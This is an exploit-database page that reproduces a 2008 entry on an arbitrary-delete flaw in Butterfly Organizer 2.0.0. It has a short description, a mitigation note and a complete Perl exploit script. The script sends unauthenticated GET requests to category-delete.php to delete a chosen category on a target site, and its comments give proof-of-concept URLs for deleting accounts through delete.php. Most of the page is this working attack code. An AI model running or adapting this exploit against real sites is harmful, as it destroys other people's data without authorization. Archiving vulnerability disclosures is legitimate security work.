Butterfly Organizer 2.0.0 - exploit.company

vendor:

Butterfly Organizer

by:

Stack

7.5

CVSS

HIGH

Arbitrary Delete

CWE

Product Name: Butterfly Organizer

Affected Version From: 2.0.0

Affected Version To: 2.0.0

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Butterfly Organizer 2.0.0 <= Arbitrary Delete (Category/Account)

This exploit allows an attacker to delete a category or account from Butterfly Organizer 2.0.0. The attacker can send a GET request to the category-delete.php or delete.php page with the name of the category or the ID of the account as a parameter.

Mitigation:

Upgrade to the latest version of Butterfly Organizer

Source

Exploit-DB raw data:

#!/usr/bin/perl -w
# Butterfly Organizer 2.0.0 <=  Arbitrary Delete (Category/Account)
# poc for del Ctegory : http://localhost/organizer/category-delete.php?tablehere=[NAME OF CATEGORY]&is_js_confirmed=1
# poc for del Account : http://localhost/organizer//delete.php?id=[id of account]&mytable=[NAME OF CATEGORY]
########################################
#[*] Founded &  Exploited by : Stack
########################################
# SIMPLE EXPLOIT WITH PERL
system("color f");
print "\t\t############################################################\n\n";
print "\t\t#       Butterfly Organizer 2.0.0 <= Arbitrary Delete      #\n\n";
print "\t\t#                     ( Category / Account )               #\n\n";
print "\t\t#                           by Stack                       #\n\n";
print "\t\t############################################################\n\n";
########################################
#----------------------------------------------------------------------------#
########################################
use LWP::UserAgent;
die "Usage: perl $0 http://victim.com/path/\n" unless @ARGV;
print "\n[!] Category name : ";
chomp(my $cat=<STDIN>);
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $ARGV[0] . "/category-delete.php?tablehere=".$cat."&is_js_confirmed=1";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
if ($answer =~ /$cat/)
{
        print "\n[+] Exploit failed \n";}else{
        print "\nBrought to you by v4-team.com...\n";
        print "\n[+] Category Deleted\n";}
 
########################################
#-------------------         Exploit exploited by Stack       --------------------#
########################################

# milw0rm.com [2008-06-13]